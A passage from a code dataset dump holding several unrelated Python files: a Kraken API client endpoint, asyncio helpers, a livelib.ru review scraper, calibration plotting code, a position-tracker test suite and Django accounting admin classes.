response_200\n return None\n\n\ndef _build_response(*, response: httpx.Response) -> Response[GetAssetInfoResponse200]:\n return Response(\n status_code=response.status_code,\n content=response.content,\n headers=response.headers,\n parsed=_parse_response(response=response),\n )\n\n\ndef sync_detailed(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Response[GetAssetInfoResponse200]:\n \"\"\"Get Asset Info\n\n Get information about the assets that are available for deposit, withdrawal, trading and staking.\n\n Args:\n asset (Union[Unset, None, str]):\n aclass (Union[Unset, None, str]):\n\n Returns:\n Response[GetAssetInfoResponse200]\n \"\"\"\n\n kwargs = _get_kwargs(\n client=client,\n asset=asset,\n aclass=aclass,\n )\n\n response = httpx.request(\n verify=client.verify_ssl,\n **kwargs,\n )\n\n return _build_response(response=response)\n\n\ndef sync(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Optional[GetAssetInfoResponse200]:\n \"\"\"Get Asset Info\n\n Get information about the assets that are available for deposit, withdrawal, trading and staking.\n\n Args:\n asset (Union[Unset, None, str]):\n aclass (Union[Unset, None, str]):\n\n Returns:\n Response[GetAssetInfoResponse200]\n \"\"\"\n\n return sync_detailed(\n client=client,\n asset=asset,\n aclass=aclass,\n ).parsed\n\n\nasync def asyncio_detailed(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Response[GetAssetInfoResponse200]:\n \"\"\"Get Asset Info\n\n Get information about the assets that are available for deposit, withdrawal, trading and staking.\n\n Args:\n asset (Union[Unset, None, str]):\n aclass (Union[Unset, None, str]):\n\n Returns:\n Response[GetAssetInfoResponse200]\n \"\"\"\n\n kwargs = _get_kwargs(\n client=client,\n asset=asset,\n aclass=aclass,\n )\n\n async with httpx.AsyncClient(verify=client.verify_ssl) as _client:\n response = await _client.request(**kwargs)\n\n return _build_response(response=response)\n\n\nasync def asyncio(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Optional[GetAssetInfoResponse200]:\n \"\"\"Get Asset Info\n\n Get information about the assets that are available for deposit, withdrawal, trading and staking.\n\n Args:\n asset (Union[Unset, None, str]):\n aclass (Union[Unset, None, str]):\n\n Returns:\n Response[GetAssetInfoResponse200]\n \"\"\"\n\n return (\n await asyncio_detailed(\n client=client,\n asset=asset,\n aclass=aclass,\n )\n ).parsed\n","repo_name":"jaggas/pykraken","sub_path":"pykraken/rest_api_client/api/market_data/get_asset_info.py","file_name":"get_asset_info.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40506290314","text":"\"\"\"\nUtility functions\n\"\"\"\nimport asyncio\nimport functools\nimport threading\nfrom tqdm import tqdm\nfrom . import runners\n\n\ndef watchdog(afunc):\n \"\"\"Stops all tasks if there is an error\"\"\"\n\n @functools.wraps(afunc)\n async def run(*args, **kwargs):\n try:\n await afunc(*args, **kwargs)\n except asyncio.CancelledError:\n return\n except Exception as err:\n print(f\"exception {err}\")\n asyncio.get_event_loop().stop()\n\n return run\n\n\ndef get_or_create_eventloop():\n try:\n return asyncio.get_event_loop()\n except RuntimeError as ex:\n if \"There is no current event loop in thread\" in str(ex):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n return asyncio.get_event_loop()\n\n\nclass RunThread(threading.Thread):\n def __init__(self, func, args, kwargs):\n self.func = func\n self.args = args\n self.kwargs = kwargs\n super().__init__()\n\n def run(self):\n self.result = runners.run(self.func(*self.args, **self.kwargs))\n\n\ndef run_async(func, *args, **kwargs):\n \"\"\"async wrapper to detect if asyncio loop is already running\n\n This is useful when already running in async thread.\n \"\"\"\n try:\n loop = get_or_create_eventloop()\n except RuntimeError:\n loop = None\n if loop and loop.is_running():\n thread = RunThread(func, args, kwargs)\n thread.start()\n thread.join()\n return thread.result\n else:\n return runners.run(func(*args, **kwargs))\n","repo_name":"plantnet/gbif-dl","sub_path":"gbif_dl/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"51"} +{"seq_id":"5049610092","text":"# This is a sample Python script.\nimport os\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport random\n\n# подключаем библиотеки\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/39.0.2171.95 Safari/537.36'}\n\n\ndef main():\n print(\"heum\")\n if not os.path.isdir(\"Dataset\"):\n os.mkdir(\"Dataset\")\n os.chdir(\"Dataset\")\n for i in range(1, 6):\n if not os.path.isdir(str(i)):\n os.mkdir(str(i))\n # Создаем папку датасет если ее нет, переходим в нее, и также создаем 5 папок если их еще нет\n url = 'https://www.livelib.ru/reviews'\n second_url = 'https://www.livelib.ru'\n number_elem = 3300\n \n number_page = 125\n quotes_1 = 76\n quotes_2 = 108\n quotes_3 = 314\n quotes_4 = 824\n quotes_5 = 998 # Задаем переменные для счета, а также инициализируем нужные ссылки не нули потому что после бана\n # нужно начинать не с начала\n while number_elem < 5000:\n response = requests.get(url, headers) # Собственно записываем в переменную нтмл текст.после используем его\n response.encoding = \"utf-8\"\n # print(response.text)\n soup = BeautifulSoup(response.text, 'lxml')\n items = soup.find_all(class_=\"footer-card__link\", href=True)\n href = []\n for item in items:\n href.append(item.get('href'))\n print(href)\n # Заходим на страницу и парсим все ссылки на полные отзывы.\n time.sleep(random.randint(10, 15))\n for i in range(len(href)):\n sec_response = requests.get(second_url + href[i])\n sec_response.encoding = \"utf-8\"\n sec_soup = BeautifulSoup(sec_response.text, 'lxml')\n quotes = sec_soup.find_all(class_=\"lenta-card__mymark\") # ищем все что нам надо и записываем это\n names = sec_soup.find_all(class_=\"lenta-card__book-title\")\n texts = sec_soup.find_all(\"div\", {\"id\": \"lenta-card__text-review-full\"})\n authors = sec_soup.find_all(class_=\"lenta-card__author\")\n new_quotes = []\n for quote in quotes:\n new_quotes.append(str((quote.text.replace(\" \", \"\")).replace(\"\\n\", \"\")))\n # заходим на в каждый отзыв и берем оттуда все нужные данные\n # print(str(len(new_quotes)) + \" \" + str(len(names))+\" \"+str(len(texts))+\" \"+str(len(authors)))\n # количество найденных данных Используется не количество найденных ссылок а мин значение из найденых\n # элементов, так ка бывает что отзыв без оценки или автора..\n y = min(len(authors), len(names), len(texts), len(new_quotes))\n if y == 0:\n continue\n print(i, y, len(authors), len(names), len(texts), new_quotes)\n x = float(new_quotes[0])\n # Сортируем отзывы по оценкам и записываем в txt файл, W+ запись и чтение(модификатор)\n if 4.5 <= x <= 5:\n quotes_5 = quotes_5 + 1\n if quotes_5 >= 1000:\n continue\n namefile = str(quotes_5).zfill(4)\n with open(\"dataset/\" + \"5\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n file.write('Оценка: ' + str(x) + '\\n' + 'Название: ' + names[0].text + '\\n' + 'Автор книги: ' +\n authors[0].text + '\\n' + 'Рецензия:' + '\\n' + texts[0].text)\n number_elem = number_elem + 1\n elif 3.5 <= x < 4.5:\n quotes_4 = quotes_4 + 1\n if quotes_4 >= 1000:\n continue\n namefile = str(quotes_4).zfill(4)\n with open(\"dataset/\" + \"4\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n file.write('Оценка: ' + str(x) + '\\n' + 'Название: ' + names[0].text + '\\n' + 'Автор книги: ' +\n authors[0].text + '\\n' + 'Рецензия:' + '\\n' + texts[0].text)\n number_elem = number_elem + 1\n elif 2.5 <= x < 3.5:\n quotes_3 = quotes_3 + 1\n if quotes_3 >= 1000:\n continue\n namefile = str(quotes_3).zfill(4)\n with open(\"dataset/\" + \"3\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n file.write('Оценка: ' + str(x) + '\\n' + 'Название: ' + names[0].text + '\\n' + 'Автор книги: ' +\n authors[0].text + '\\n' + 'Рецензия:' + '\\n' + texts[0].text)\n number_elem = number_elem + 1\n elif 1.5 <= x < 2.5:\n quotes_2 = quotes_2 + 1\n if quotes_2 >= 1000:\n continue\n namefile = str(quotes_2).zfill(4)\n with open(\"dataset/\" + \"2\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n file.write('Оценка: ' + str(x) + '\\n' + 'Название: ' + names[0].text + '\\n' + 'Автор книги: ' +\n authors[0].text + '\\n' + 'Рецензия:' + '\\n' + texts[0].text)\n number_elem = number_elem + 1\n else:\n quotes_1 = quotes_1 + 1\n if quotes_1 >= 1000:\n continue\n namefile = str(quotes_1).zfill(4)\n with open(\"dataset/\" + \"1\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n file.write('Оценка: ' + str(x) + '\\n' + 'Название: ' + names[0].text + '\\n' + 'Автор книги: ' +\n authors[0].text + '\\n' + 'Рецензия:' + '\\n' + texts[0].text)\n number_elem = number_elem + 1\n #time.sleep(random.randint(55, 60))\n # прибавляем счетчик\n # #режим ждуна шоб не забанило\n number_page = number_page + 1 # Инкрементируем счетчик страниц и перелистываем страничку, после все заново\n url = 'https://www.livelib.ru/reviews' + '~' + str(number_page) + '#reviews'\n # И так 5000 раз :)\n\n\nif __name__ == \"__main__\": # запуск мейна\n main()\n","repo_name":"Colnuwko/Laba_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6928,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35113631053","text":"from pathlib import Path\nfrom typing import Callable, Tuple, Union\n\nimport torch\nfrom matplotlib import pyplot as plt\nfrom torch import Tensor\n\nfrom .polyfit import polyval\n\n\nclass Scatter:\n '''\n Helper class for scatter plots of image points and reprojected points\n '''\n\n def __init__(self, title: str, num_plots: int, dim: int = None):\n import math\n cols = int(math.ceil(math.sqrt(num_plots)))\n rows = int(math.ceil(num_plots / cols))\n self.fig, ax = plt.subplots(\n rows, cols, squeeze=False, figsize=(12, 12))\n plt.suptitle(title)\n ax = ax.flatten()\n for i in range(num_plots, rows * cols):\n ax[i].axis('off')\n self.ax = ax[:num_plots]\n for a in self.ax:\n a.axis('equal')\n a.grid(True)\n if dim is not None:\n from matplotlib.patches import Rectangle\n for a in self.ax:\n a.add_patch(Rectangle((-dim, -dim), 2 *\n dim, 2 * dim, fill=False))\n\n def imshow(self, images: Tensor, image_shape: Tuple[int]) -> None:\n '''\n Show images with arbitrary resolution matched to `image_shape`\n '''\n self.fig.subplots_adjust(0.01, 0.01, 0.99, 0.90, 0.0, 0.0)\n H, W = image_shape\n for a, i in zip(self.ax, images):\n a.imshow(i, extent=(-0.5, W - 0.5, H - 0.5, -0.5))\n a.axis('off')\n\n def __call__(self, points: Tensor, **kwargs):\n '''\n Scatter plot given points\n '''\n for a, p in zip(self.ax, points):\n a.scatter(p[:, 0], p[:, 1], **kwargs)\n\n def show(self) -> None:\n '''\n Show the plot\n '''\n plt.show()\n\n def save(self, filepath: Union[str, Path], *args, **kwargs):\n '''\n Save the figure to `filepath`\n '''\n self.fig.savefig(filepath, *args, **kwargs)\n\n def clear(self) -> None:\n '''\n Clear all axes\n '''\n for a in self.ax:\n a.clear()\n\n def close(self) -> None:\n '''\n Close the figure\n '''\n plt.close(self.fig)\n\n\ndef plot_rz_curve(r_max: float, poly: Tensor, norm: float,\n num_points: int = 100,\n xlabel: str = None, ylabel: str = None,\n f_ideal: Callable[[Tensor], Tensor] = None) -> plt.Figure:\n '''\n Plots the radius (image points) over `z` coordinate\n Radius is the length of the `(x, y)` vector\n `(x, y, z)` forms the view vector into the view coordinate system\n '''\n x = torch.linspace(0, r_max, num_points).to(poly)\n y = polyval(x, poly)\n fig = plt.figure()\n plt.plot(x / norm, y / norm, color='r', label='calibrated')\n if f_ideal is not None:\n plt.plot(x / norm, f_ideal(x) / norm, color='g', label='ideal')\n plt.grid(True)\n plt.axis('equal')\n plt.xlabel(xlabel or 'Radius in relative coordinates')\n plt.ylabel(ylabel or 'Z in relative coordinates')\n plt.legend()\n return fig\n\n\ndef plot_thetar_curve(theta_max: float, poly: Tensor, norm: float,\n num_points: int = 100,\n xlabel: str = None, ylabel: str = None,\n f_ideal: Callable[[Tensor], Tensor] = None) \\\n -> plt.Figure:\n '''\n Plots the incident angle `theta` over the radius\n Given a view vector `(x, y, z)`, `theta` is the angle between\n this vector and `(0, 0, 1)`\n Radius is the length of the `(x, y)` vector\n '''\n x = torch.linspace(0, theta_max, num_points).to(poly)\n y = polyval(x, poly) / norm\n fig = plt.figure()\n plt.plot(x, y, color='r', label='calibrated')\n if f_ideal is not None:\n plt.plot(x, f_ideal(x) / norm, color='g', label='ideal')\n plt.grid(True)\n plt.axis('equal')\n plt.xlabel(xlabel or 'Incident angle in radian')\n plt.ylabel(ylabel or 'Radius in relative coordinates')\n plt.legend()\n return fig\n","repo_name":"tasptz/py-omnicalib","sub_path":"omnicalib/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"51"} +{"seq_id":"16476531071","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nfrom collections import defaultdict\n\nimport mock\nimport pytest\n\nfrom data_pipeline._position_data_tracker import PositionDataTracker\nfrom data_pipeline.message import CreateMessage\nfrom data_pipeline.schematizer_clientlib.models.avro_schema import AvroSchema\nfrom data_pipeline.schematizer_clientlib.models.topic import Topic\nfrom data_pipeline.schematizer_clientlib.schematizer import SchematizerClient\nfrom tests.helpers.config import reconfigure\n\n\nclass BasePositionDataTrackerTest(object):\n\n @pytest.yield_fixture(scope=\"module\", autouse=True)\n def patch_contains_pii(self):\n mock_date = '2015-01-01'\n mock_topic = Topic(\n 1, str('my-topic'), None, False, 'datapipe', [], mock_date, mock_date\n )\n mock_schema = AvroSchema(\n 1, 'schema', mock_topic, None, 'RW', None, None, mock_date, mock_date\n )\n mock_schematizer_client = mock.Mock(spec=SchematizerClient)\n with mock.patch(\n 'data_pipeline.schematizer_clientlib.schematizer.SchematizerClient',\n return_value=mock_schematizer_client\n ), mock.patch.object(\n mock_schematizer_client,\n 'get_schema_by_id',\n return_value=mock_schema\n ), mock.patch.object(\n mock_schematizer_client,\n 'get_meta_attributes_by_schema_id',\n return_value=[]\n ):\n yield\n\n @property\n def valid_message_data(self):\n return {\n 'schema_id': 123,\n 'payload': bytes(10)\n }\n\n @property\n def topic(self):\n return str('my-topic')\n\n def test_merged_upstream_position_info_map(self, tracker):\n other_topic = str('other-topic')\n self._publish_messages(tracker, [\n self._create_message_with_offsets({0: 10}),\n self._create_message(upstream_position_info=None),\n self._create_message_with_offsets({1: 14}),\n self._create_message_with_offsets({0: 18}),\n self._create_message_with_offsets({2: 20}),\n self._create_message_with_offsets({0: 42}, topic=other_topic)\n ])\n position_data = tracker.get_position_data().merged_upstream_position_info_map\n expected_position_data = {\n self.topic: {0: 18, 1: 14, 2: 20},\n other_topic: {0: 42}\n }\n assert position_data == expected_position_data\n\n def _publish_messages(self, tracker, messages):\n messages_published = defaultdict(int)\n for message in messages:\n tracker.record_message_buffered(message)\n messages_published[message.topic] += 1\n\n for topic, count in messages_published.iteritems():\n tracker.record_messages_published(topic, 0, count)\n\n def _create_message(self, **kwargs):\n message_data = self.valid_message_data\n message_data.update(kwargs)\n return CreateMessage(**message_data)\n\n def _create_message_with_offsets(self, offsets, topic=None):\n if topic is None:\n topic = self.topic\n return self._create_message(upstream_position_info={topic: offsets})\n\n\nclass TestPositionDataTracker(BasePositionDataTrackerTest):\n @pytest.fixture\n def tracker(self):\n return PositionDataTracker()\n\n @pytest.fixture\n def position_info(self):\n return {0: 10}\n\n def test_publishing_message_sets_position_info(self, tracker, position_info):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info=position_info),\n ])\n position_data = tracker.get_position_data()\n assert position_data.last_published_message_position_info == position_info\n assert position_data.topic_to_last_position_info_map == {self.topic: position_info}\n\n def test_publishing_message_without_position_info_clears_position_info(self, tracker):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info={0: 10}),\n self._create_message(upstream_position_info=None)\n ])\n position_data = tracker.get_position_data()\n assert position_data.last_published_message_position_info is None\n assert position_data.topic_to_last_position_info_map == {self.topic: None}\n\n def test_publishing_message_when_skipping_unset_position_info(self, tracker, position_info):\n with reconfigure(skip_position_info_update_when_not_set=True):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info=position_info),\n self._create_message(upstream_position_info=None)\n ])\n position_data = tracker.get_position_data()\n assert position_data.last_published_message_position_info == position_info\n assert position_data.topic_to_last_position_info_map == {self.topic: position_info}\n\n def test_publishing_message_with_different_position_info_keys(self, tracker):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info={0: 10}),\n self._create_message(upstream_position_info={1: 12})\n ])\n position_data = tracker.get_position_data()\n assert position_data.last_published_message_position_info == {1: 12}\n assert position_data.topic_to_last_position_info_map == {self.topic: {1: 12}}\n\n\nclass TestMergingPositionDataTracker(BasePositionDataTrackerTest):\n @pytest.yield_fixture\n def tracker(self):\n with reconfigure(\n skip_position_info_update_when_not_set=True,\n merge_position_info_update=True\n ):\n yield PositionDataTracker()\n\n def test_publishing_with_merged_position_info(self, tracker):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info={0: 10}),\n self._create_message(upstream_position_info=None),\n self._create_message(upstream_position_info={0: 12, 1: 14}),\n self._create_message(upstream_position_info={1: 18, 2: 20}),\n ])\n position_data = tracker.get_position_data()\n expected_position_info = {0: 12, 1: 18, 2: 20}\n assert position_data.last_published_message_position_info == expected_position_info\n assert position_data.topic_to_last_position_info_map == {self.topic: expected_position_info}\n","repo_name":"Yelp/data_pipeline","sub_path":"tests/_position_data_tracker_test.py","file_name":"_position_data_tracker_test.py","file_ext":"py","file_size_in_byte":6404,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"40732807103","text":"from django.contrib import admin, messages\nfrom django.http import JsonResponse\nfrom django.urls import path\nfrom django.utils.html import format_html\nfrom django.utils.translation import ngettext\n\nfrom ebos2201.admin.a01_core_mas import T01BaseAdmin\nfrom ebos2210.admin.a10_fin_link import T10Gld10Admin, T10Gld11Inline\n\nfrom ..forms.f10_fin_gl import *\nfrom ..forms.f10_fin_main import (\n T10Abr10Form,\n T10Alc10Form,\n T10Gla10Form,\n T10Jvm10Form,\n T10Tic10Form,\n T10Tic11Form,\n)\nfrom ..formset import T10Alc11InlineFormSet, T10Alc12InlineFormSet\nfrom ..models.m10_fin_gl import *\nfrom ..models.m10_fin_link import *\nfrom ..views import *\n\n\nclass T10Jvm10Admin(T10Gld10Admin):\n list_display = (\n \"vou_type\",\n \"vou_num\",\n \"vou_date\",\n \"amount\",\n \"comment1\",\n \"comment2\",\n \"post_flag\",\n \"delete_flag\",\n \"division\",\n \"print_pdf\",\n )\n list_display_links = (\n \"vou_type\",\n \"vou_num\",\n \"vou_date\",\n \"amount\",\n \"comment1\",\n \"comment2\",\n \"post_flag\",\n \"delete_flag\",\n \"division\",\n )\n fields = (\n \"prg_type\",\n (\"division\", \"vou_type\", \"vou_curr\"),\n (\"vou_date\", \"vou_num\", \"vou_hdr_ref\"),\n \"comment1\",\n \"comment2\",\n )\n form = T10Jvm10Form\n inlines = [T10Gld11Inline]\n vou_type = \"JVM\"\n change_form_template = \"ebos2210/admin/t10_jvm_ap_ar_change_form.html\"\n\n\nadmin.site.register(T10Jvm10, T10Jvm10Admin)\n\n\nclass T10Unp10Admin(T10Gld10Admin):\n list_filter = (\"division\", \"vou_type\")\n vou_type = \"UNP\"\n inlines = [T10Gld11Inline]\n\n def has_add_permission(self, request, obj=None):\n return False\n\n\nadmin.site.register(T10Unp10, T10Unp10Admin)\n\n\nclass T10Alc11Inline(admin.TabularInline):\n model = T10Alc11\n formset = T10Alc11InlineFormSet\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nclass T10Alc12Inline(admin.TabularInline):\n model = T10Alc12\n formset = T10Alc12InlineFormSet\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nclass T10Alc10Admin(admin.ModelAdmin):\n form = T10Alc10Form\n list_display = (\n \"division\",\n \"vou_type\",\n \"vou_num\",\n \"vou_date\",\n \"subledger\",\n \"date_choice\",\n \"date_from\",\n \"date_to\",\n \"cr_date_from\",\n \"cr_date_upto\",\n \"alloc_lock_flag\",\n )\n fields = (\n \"prg_type\",\n (\"division\", \"vou_type\", \"vou_date\"),\n (\"subledger\", \"coa\", \"vou_num\"),\n (\"date_from\", \"date_to\", \"alloc_lock_flag\"),\n (\n \"cr_date_from\",\n \"cr_date_upto\",\n ),\n )\n inlines = [T10Alc11Inline, T10Alc12Inline]\n readonly_fields = (\"alloc_lock_flag\", \"vou_num\")\n change_form_template = \"ebos2210/admin/t10_allocation_change_form.html\"\n\n def get_readonly_fields(self, request, obj=None):\n if obj: # editing an existing object\n return (\n \"division\",\n \"vou_type\",\n \"vou_date\",\n \"subledger\",\n \"coa\",\n \"date_choice\",\n \"date_from\",\n \"date_to\",\n \"cr_date_from\",\n \"cr_date_upto\",\n ) + self.readonly_fields\n return self.readonly_fields\n\n def has_change_permission(self, request, obj=None):\n if obj and obj.alloc_lock_flag:\n return False\n return True\n\n class Media:\n css = {\n \"all\": (\n \"css/admin.css\",\n \"css/inline-grid.css\",\n ),\n }\n\n # url to get division data\n def get_urls(self):\n urls = super().get_urls()\n custom_urls = [\n path(\"add/fetch_t10cfg10//\", self.get_division),\n ]\n return custom_urls + urls\n\n # function to fetch division data\n def get_division(self, request, division):\n div_curr = T01Div10.objects.get(id=division).currency\n result = {\"division_curr\": div_curr.id, \"base_curr\": div_curr.currency_name}\n\n return JsonResponse(result)\n\n # On add form fill vou_date as current date\n def get_changeform_initial_data(self, request):\n\n return {\n \"vou_date\": date.today(),\n }\n\n\n# First Child Model -- Proxy Models\n\n\nclass T10Tb01Admin(T01BaseAdmin):\n list_display = (\n \"division\",\n \"type_of_rpt\",\n \"year\",\n \"month\",\n \"csv_button\",\n \"pdf_button\",\n )\n exclude = (\"rpt_code\", \"day\", \"company\", \"as_of_date\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10Ctb01Admin(admin.ModelAdmin):\n list_display = (\"company\", \"type_of_rpt\", \"year\", \"month\", \"csv_button\")\n exclude = (\"rpt_code\", \"day\", \"division\", \"file_pdf\")\n readonly_fields = [\"file_csv\"]\n\n class Media:\n css = {\n \"all\": (\"css/admin.css\",),\n }\n js = (\"admin/js/common.js\",)\n\n def csv_button(self, obj):\n return format_html(\n \"Download\",\n settings.SITE_DOMAIN + settings.MEDIA_URL + str(obj.file_csv),\n )\n\n csv_button.short_description = \"CSV file\"\n\n\nclass T10Bs01Admin(T01BaseAdmin):\n list_display = (\n \"division\",\n \"type_of_rpt\",\n \"year\",\n \"month\",\n \"csv_button\",\n \"pdf_button\",\n )\n exclude = (\"rpt_code\", \"day\", \"company\", \"as_of_date\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10Pl01Admin(T01BaseAdmin):\n list_display = (\n \"division\",\n \"type_of_rpt\",\n \"year\",\n \"month\",\n \"csv_button\",\n \"pdf_button\",\n )\n exclude = (\"rpt_code\", \"day\", \"company\", \"as_of_date\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10Tbc01Admin(T01BaseAdmin):\n list_display = (\"division\", \"year\", \"month\", \"pdf_button\")\n exclude = (\"rpt_code\", \"type_of_rpt\", \"day\", \"company\", \"file_csv\", \"as_of_date\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10CshFlow01Admin(T01BaseAdmin):\n list_display = (\"division\", \"year\", \"month\", \"pdf_button\")\n exclude = (\"rpt_code\", \"type_of_rpt\", \"day\", \"company\", \"file_csv\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10TbDt01Admin(T01BaseAdmin):\n list_display = (\"division\", \"as_of_date\", \"csv_button\", \"pdf_button\")\n exclude = (\n \"rpt_code\",\n \"type_of_rpt\",\n \"year\",\n \"month\",\n \"day\",\n \"company\",\n )\n readonly_fields = (\n \"file_csv\",\n \"file_pdf\",\n )\n\n\nclass T10BsDt01Admin(T01BaseAdmin):\n list_display = (\"division\", \"as_of_date\", \"csv_button\", \"pdf_button\")\n exclude = (\"rpt_code\", \"type_of_rpt\", \"day\", \"year\", \"month\", \"company\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10PlDt01Admin(T01BaseAdmin):\n list_display = (\"division\", \"as_of_date\", \"csv_button\", \"pdf_button\")\n exclude = (\"rpt_code\", \"type_of_rpt\", \"day\", \"company\", \"year\", \"month\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\n# Second Child Model -- Proxy Models\n\n\nclass T10GlrB01Admin(T01BaseAdmin):\n form = T10GlrB01Form\n list_display = (\n \"division\",\n \"coa\",\n \"subledger\",\n \"dt_from\",\n \"dt_upto\",\n \"csv_button\",\n \"pdf_button\",\n )\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10Glc01Admin(T01BaseAdmin):\n form = T10Glc01Form\n list_display = (\"division\", \"coa\", \"subledger\", \"dt_from\", \"dt_upto\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10Stm01Admin(T01BaseAdmin):\n form = T10Stm01Form\n list_display = (\n \"division\",\n \"subledger\",\n \"vou_curr\",\n \"dt_from\",\n \"dt_upto\",\n \"pdf_button\",\n )\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10Stm02Admin(T01BaseAdmin):\n form = T10Stm02Form\n list_display = (\n \"division\",\n \"subledger\",\n \"vou_curr\",\n \"dt_from\",\n \"dt_upto\",\n \"pdf_button\",\n )\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10Dbk01Admin(T01BaseAdmin):\n list_display = (\"division\", \"dt_from\", \"dt_upto\", \"pdf_button\")\n exclude = (\n \"rpt_code\",\n \"coa\",\n \"subledger\",\n \"vou_curr\",\n \"aging1\",\n \"aging2\",\n \"aging3\",\n \"file_csv\",\n )\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10SlCoa01Admin(T01BaseAdmin):\n form = T10SlCoa01Form\n list_display = (\"division\", \"dt_upto\", \"coa\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10SlCoa02Admin(T01BaseAdmin):\n form = T10SlCoa02Form\n list_display = (\"division\", \"dt_from\", \"dt_upto\", \"coa\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10LdgAcc01Admin(T01BaseAdmin):\n form = T10LdgAcc01Form\n list_display = (\"division\", \"dt_upto\", \"subledger\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10ChrAcc01Admin(T01BaseAdmin):\n form = T10ChrAcc01Form\n list_display = (\"division\", \"dt_upto\", \"coa\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10AgRpt01Admin(T01BaseAdmin):\n form = T10AgRpt01Form\n list_display = (\n \"division\",\n \"dt_upto\",\n \"subledger\",\n \"aging1\",\n \"aging2\",\n \"aging3\",\n \"csv_button\",\n \"pdf_button\",\n )\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nadmin.site.register(T10Tb01, T10Tb01Admin)\nadmin.site.register(T10Ctb01, T10Ctb01Admin)\nadmin.site.register(T10Bs01, T10Bs01Admin)\nadmin.site.register(T10Pl01, T10Pl01Admin)\nadmin.site.register(T10Tbc01, T10Tbc01Admin)\nadmin.site.register(T10CshFlow01, T10CshFlow01Admin)\nadmin.site.register(T10TbDt01, T10TbDt01Admin)\nadmin.site.register(T10BsDt01, T10BsDt01Admin)\nadmin.site.register(T10PlDt01, T10PlDt01Admin)\nadmin.site.register(T10GlrB01, T10GlrB01Admin)\nadmin.site.register(T10Glc01, T10Glc01Admin)\n# admin.site.register(T10Alc10, T10Alc10Admin)\nadmin.site.register(T10Stm01, T10Stm01Admin)\nadmin.site.register(T10Stm02, T10Stm02Admin)\nadmin.site.register(T10Dbk01, T10Dbk01Admin)\nadmin.site.register(T10SlCoa01, T10SlCoa01Admin)\nadmin.site.register(T10SlCoa02, T10SlCoa02Admin)\nadmin.site.register(T10LdgAcc01, T10LdgAcc01Admin)\nadmin.site.register(T10ChrAcc01, T10ChrAcc01Admin)\nadmin.site.register(T10AgRpt01, T10AgRpt01Admin)\nadmin.site.register([T10Cfg10, T10Wor10])\n\n\n# Financial year closing\nclass T10Fyc10Admin(admin.ModelAdmin):\n fields = [\n \"division\",\n \"gl_code\",\n \"closing_year\",\n \"closing_opt\",\n \"vou_hdr_ref\",\n \"net_profit_loss\",\n ]\n readonly_fields = [\"net_profit_loss\"]\n list_display = [\"division\", \"closing_year\", \"closing_opt\", \"net_profit_loss\"]\n\nadmin.site.register(T10Fyc10, T10Fyc10Admin)\n\n\nclass T10Gla10Admin(T10Alc10Admin, T01BaseAdmin):\n form = T10Gla10Form\n exclude = [\n \"currency\",\n \"hdr_comment\",\n \"issued_to\",\n \"tot_amount\",\n \"line_narration\",\n \"chq_num\",\n \"chq_date\",\n ]\n actions = [\"print_alc_rpt\"]\n\n \"\"\" Print Allocation Report custom action functionality \"\"\"\n\n def print_alc_rpt(self, request, queryset):\n try:\n gl_alloc = queryset[0]\n gl_alloc_rpt = GlAllocRpt()\n 